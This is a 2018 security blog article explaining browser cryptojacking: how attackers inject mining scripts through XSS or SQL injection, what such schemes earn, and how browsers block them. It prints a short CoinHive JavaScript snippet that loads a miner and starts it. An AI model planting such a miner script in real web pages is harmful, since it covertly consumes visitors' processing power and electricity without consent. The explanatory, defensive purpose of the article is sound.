General security

New Era of Crypto-jacking

Pedro Tavares
March 6, 2018 by
Pedro Tavares

Introduction

Recently, cryptocurrencies have been making the headlines, especially with the number of attacks that have been occurring. In technical terms, this is also known as "Crypto-Jacking," or "Cryptomining."

The inception of the Cryptocurrency began in 2008. Satoshi Nakamoto registered the domain name bitcoin.org on August 18th, 2008. A new paradigm was born, and this allowed for the transaction of money through the Internet as it has never been seen before. As a result, it was only a matter of time before the Cyber attacker explored the complexity of this distributed technology.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Crypto-jacking allows the Cyber attacker to use a web browser to harvest cryptocurrency such as the Bitcoin. Some resources, such as the user's CPU power and levels of electricity usage, are used to mine the Cryptocurrency covertly.

How crypto-jacking works

The Cyber attackers are using techniques such as Code Injection, Cross-Site Scripting (XSS), and SQL Injection (SQLi) to add a malicious snippet of code into a target system.

In web browser crypto-jacking schemes, the Cyber attacker uses a JavaScript on a web page to mine the cryptocurrency. JavaScript runs on almost all websites and is thus executed on the client-side, in the user's web-browser.

The illustration below shows how this type of scheme is deployed:

Initially, the Cyber attacker adds malicious code into the target platform, (such as a website marked as 1. in the figure above). The user accesses the website via their web-browser, and the server renders the web content. The malicious code is then coupled together with the website code, and the mining process commences.

There are different tools in which the mining codes can be entered into a website. The best known is CoinHive, which uses JavaScript, Crypto-Loot, JSEcoin, Coin Have, and PPoi. These APIs offer a miner for cryptocurrencies, such as Monero, which has gained popularity over the last few months.

Next, a piece of code that can be used to mine a cryptocurrency is illustrated below:

<script src="https://coin-hive.com/lib/coinhive.min.js">

</script>

<script>

var miner = new CoinHive.Anonymous('YOUR_TOKEN');

miner.start();

</script>

The malicious snippet is described as follows:

  1. The CoinHive's JavaScript library is loaded.
  2. The CoinHive API with the Monero token is set up.
  3. The miner then starts.

Advertisements and the crypto-jacking scheme

Cryptominers can be used legally when the website owner asks visitors for permission to use their processing power for mining purposes. Nonetheless, this practice becomes abusive when the Cyber attacker accesses and uses the other users' machines without permission (this becomes crypto-jacking). The Cyber attacker thus slows down the target computer by using the memory and processing power, while at the same time, increasing the unsuspecting user's electricity bills.

How much money can hackers make through such schemes?

This question does not have an absolute answer. It depends on how much website traffic is being used. According to a crypto-mining experiment conducted by Maxence Cornet, a negative rate of return is yielded for approximately 1,000 visits per day and with 55 seconds of session duration for a website.

It mined 0.00947 XMR in 60 hours. That is a total of $0.89, or $0.36 per day. In comparison, a website with the same number of daily visits that uses conventional advertising could potentially get a better rate of return when compared to the mining approaches.

It is important to note that the rise of crypto-jacking is occurring at a rapid pace. As a result, Google and Opera web-browsers have solutions in place that are currently blocking in-browser crypto-jacking.

For example, Opera developed a browser functionality to stop malicious mining. Google Chrome has also created an extension called "No Coin Available" that blocks abusive mining.

Conclusion

As with other security matters, it is crucial to update systems and networks so that they are not maliciously exploited.

Hardware and electricity are two of the most significant expenses for encryption miners. Using crypto-jackers, the Cyber attacker can bypass these expenses and covertly make their victims pay for it without their knowledge. Crypto-jackers can use 100% of the CPU power of the target machine. This results in overloaded CPUs and a breakdown of the entire process.

Finally, when you suspect that any website you visit may be compromised, you can verify this by entering the URL of the website on the Who is mining website. This is an up-to-date list of the websites that are currently used to mine cryptocurrency.

References

[1] https://www.cyberscoop.com/cryptojacking-malware-ransomware-zcash-monero-bitdefender

[2] https://nakedsecurity.sophos.com/2018/02/14/watch-our-ads-or-well-use-your-cpu-for-cryptomining/

[3] https://medium.com/@MaxenceCornet/coinhive-review-embeddable-javascript-crypto-miner-806f7024cde8

[4] https://seguranca-informatica.pt/crypto-jacking-again-identified-in-monero-cryptocurrency/

Pedro Tavares
Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and a Security Evangelist. He is also Editor-in-Chief of the security computer blog seguranca-informatica.pt.

In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics, such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and security in computer networks. He is also a Freelance Writer.